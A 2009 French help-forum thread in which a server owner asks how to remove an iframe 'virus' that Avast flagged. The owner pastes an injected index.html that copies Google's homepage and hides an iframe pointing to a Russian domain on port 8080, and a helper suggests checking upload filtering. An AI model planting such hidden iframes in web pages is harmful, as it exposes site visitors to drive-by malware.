Trojan sur mon ftp - Impossible a virer

Fermé
IdleMan Messages postés 243 Date d'inscription jeudi 17 janvier 2008 Statut Membre Dernière intervention 25 juin 2012 - 16 sept. 2009 à 10:04
Nabla's Messages postés 18203 Date d'inscription mercredi 4 juin 2008 Statut Contributeur Dernière intervention 28 avril 2014 - 16 sept. 2009 à 10:23
Bonjour,
J'ai un petit soucis, je vais essayer d'être le plus précis possible n'hésitez pas a poser des questions pour un éventuel complément d'informations.

J'ai installé un serveur LAMP (Linux Apache Mysql PHP ) sur mon dédié , tous fonctionnais jusqu'ici .
Mais aujourd'hui je me connecte a mon ip et Avast me signal que mon ftp contient un virus iframe :

Voici l'apercu de l'alerte :
https://imageshack.com/


Or impossible de trouver et de supprimer ce fichier \{gzip} que ce qoit en accedant a mon serveur par ftp ou par console ssh il est invisible .

Si quelqu'un a la moindre piste sur la façon d'éliminer ce fichier ou encore sur la façon dont j'ai pu le choper je lui serais très reconnaissant de m'en faire part .

Merci d'avance.
A voir également:

3 réponses

Nabla's Messages postés 18203 Date d'inscription mercredi 4 juin 2008 Statut Contributeur Dernière intervention 28 avril 2014 3 192
16 sept. 2009 à 10:08
a mon avis, le code de ta page a été modifié. gzip ca doit etre juste pour la compression. verifies le contenu des fichiers sources de ton site
0
IdleMan Messages postés 243 Date d'inscription jeudi 17 janvier 2008 Statut Membre Dernière intervention 25 juin 2012 60
16 sept. 2009 à 10:16
Ok , j'ai regardé et j'ai trouvé une page index.html a la racine de mon site qui n'a rien a faire la . Il semblerait que c'est elle qui cause les alertes d'avast, le code source de cette page est :

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>window.google={kEI:"IKWsSpPnLZWMjAeB4pzyBw",kEXPI:"17259,21480,21486,21588,21766,21771,21813,21823",kCSIE:"17259,21480,21486,21588,21766,21771,21813,21823",kCSI:{e:"17259,21480,21486,21588,21766,21771,21813,21823",ei:"IKWsSpPnLZWMjAeB4pzyBw"},kHL:"fr"};

window.google.sn="webhp";window.google.timers={load:{t:{start:(new Date).getTime()}}};try{window.google.pt=window.gtbExternal&&window.gtbExternal.pageT()||window.external&&window.external.pageT}catch(b){}
window.google.jsrt_kill=1;
var _gjwl=location;function _gjuc(){var e=_gjwl.href.indexOf("#");if(e>=0){var a=_gjwl.href.substring(e);if(a.indexOf("&q=")>0||a.indexOf("#q=")>=0){a=a.substring(1);if(a.indexOf("#")==-1){for(var c=0;c<a.length;){var d=c;if(a.charAt(d)=="&")++d;var b=a.indexOf("&",d);if(b==-1)b=a.length;var f=a.substring(d,b);if(f.indexOf("fp=")==0){a=a.substring(0,c)+a.substring(b,a.length);b=c}else if(f=="cad=h")return 0;c=b}_gjwl.href="/search?"+a+"&cad=h";return 1}}}return 0}function _gjp(){!(window._gjwl.hash&&
window._gjuc())&&setTimeout(_gjp,500)};
window._gjp && _gjp()</script><style>td{line-height:.8em;}.gac_m td{line-height:17px;}form{margin-bottom:20px;}body,td,a,p,.h{font-family:arial,sans-serif}.h{color:#36c;font-size:20px}.q{color:#00c}.ts td{padding:0}.ts{border-collapse:collapse}em{font-weight:bold;font-style:normal}.lst{font-family:arial,sans-serif;font-size:17px;margin-bottom:0.2em;vertical-align:bottom; }.lsb{font-size:15px;height:28px;margin:0.2em;}#gbar{height:22px}.gbh,.gbd{border-top:1px solid #c9d7f1;font-size:1px}.gbh{height:0;position:absolute;top:24px;width:100%}#guser{padding-bottom:7px !important;text-align:right}#gbar,#guser{font-size:13px;padding-top:1px !important}@media all{.gb1,.gb3{height:22px;margin-right:.5em;vertical-align:top}#gbar{float:left}}a.gb1,a.gb3{color:#00c !important}.gb3{text-decoration:none}</style><script>google.y={};google.x=function(e,g){google.y[e.id]=[e,g];return false};</script></head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad="document.f.q.focus();if(document.images)new Image().src='/images/nav_logo6.png'" topmargin=3 marginheight=3><div style="display:none"><iframe src="http://pornishe.ru:8080/index.php" width=236 height=665 ></iframe></div><div style="display:none"></div><textarea id=csi style=display:none></textarea><div id=gbar><nobr><b class=gb1>Web</b> <a href="https://images.google.fr/imghp?hl=fr&tab=wi&gws_rd=ssl" class=gb1>Images</a> <a href="https://www.google.fr/videohp?hl=fr&gws_rd=ssl" class=gb1>Vidéos</a> <a href="https://www.google.fr/maps?hl=fr&tab=wl" class=gb1>Maps</a> <a href="https://news.google.com/topstories?hl=fr&tab=wn&gl=FR&ceid=FR:fr" class=gb1>Actualités</a> <a href="https://groups.google.com/forum/?hl=fr#!homeredir" class=gb1>Groupes</a> <a href="https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1" class=gb1>Gmail</a> <a href="https://about.google/intl/fr/products/" class=gb3><u>plus</u> &raquo;</a></nobr></div><div id=guser width=100%><nobr><a href="/url?sa=p&pref=ig&pval=3&q=http://www.google.fr/ig%3Fhl%3Dfr%26source%3Diglk&usg=AFQjCNG3dQ3pMQCxA1EqhLnWIuH8E97qKg">iGoogle</a> | <a href="https://accounts.google.com/Login?hl=fr&%3Bcontinue=http%3A%2F%2Fwww.google.fr%2F">Connexion</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div><center><br clear=all id=lgpd><img alt="Google" height=110 src="/intl/fr_fr/images/logo.gif" width=276 id=logo onload="window.lol&&lol()"><br><br><form action="/search" name=f><table cellpadding=0 cellspacing=0><tr valign=top><td width=25%>&nbsp;</td><td align=center nowrap><input name=hl type=hidden value=fr><input name=source type=hidden value=hp><input type=hidden name=ie value="ISO-8859-1"><input autocomplete="off" maxlength=2048 name=q size=55 class=lst title="Recherche Google" value=""><br><input name=btnG type=submit value="Recherche Google" class=lsb><input name=btnI type=submit value="J'ai de la chance" class=lsb></td><td nowrap width=25% align=left><font size=-2>&nbsp;&nbsp;<a href=/advanced_search?hl=fr>Recherche avancée</a><br>&nbsp;&nbsp;<a href=/preferences?hl=fr>Préférences</a><br>&nbsp;&nbsp;<a href=/language_tools?hl=fr>Outils linguistiques</a></font></td></tr><tr><td align=center colspan=3><font size=-1><span style="text-align:left">Rechercher dans : <input id=all type=radio name=meta value="" checked><label for=all> Web </label> <input id=lgr type=radio name=meta value="lr=lang_fr"><label for=lgr> Pages francophones </label> <input id=cty type=radio name=meta value="cr=countryFR"><label for=cty> Pages : France </label> </span></font></td></tr></table></form><br><br><font size=-1><a href="/intl/fr/ads/">Programmes de publicité</a> - <a href="/services/">Solutions d'entreprise</a> - <a href="/intl/fr/about.html">À propos de Google</a> - <a href=http://www.google.com/ncr>Google.com in English</a></font><p><font size=-2>&copy;2009 - <a href="/intl/fr/privacy.html">Confidentialité</a></font></p></center><div id=xjsd></div><div id=xjsi><script>if(google.y)google.y.first=[];if(google.y)google.y.first=[];google.dstr=[];google.rein=[];window.setTimeout(function(){var a=document.createElement("script");a.src="/extern_js/f/CgJmchICZnIgACswCjg2LCswDjgHLCswGDgELCswJTjJiAEsKzAmOAUsKzAnOAIs/Z1xyMG8mG-k.js";(document.getElementById("xjsd")||document.body).appendChild(a)},0);
;google.y.first.push(function(){google.ac.i(document.f,document.f.q,'','')});google.xjs&&google.j&&google.j.xi&&google.j.xi()</script></div><script>(function(){
function a(){google.timers.load.t.ol=(new Date).getTime();google.report&&google.report(google.timers.load,google.kCSI)}if(window.addEventListener)window.addEventListener("load",a,false);else if(window.attachEvent)window.attachEvent("onload",a);google.timers.load.t.prt=(new Date).getTime();
})();
</script>



Je l'ai supprimée mais si elle est parvenue a s'implanter une fois j'ai peur qu'elle revienne, quelqu'un a t'il une idée de la faille qui a pu causer ça ?
0
Nabla's Messages postés 18203 Date d'inscription mercredi 4 juin 2008 Statut Contributeur Dernière intervention 28 avril 2014 3 192
16 sept. 2009 à 10:23
 src="http://pornishe.ru:8080/index.php"

ton site était devenu porn en plus ;)

il y a surement un faille dans ton site, mais mon niveau en sécurité est plus bas que celui des pirates ;)
tu devrai déja vérifier, si tu as un script d'uplaod, qu'il filtre bien le type de fichiers envoyés ..
0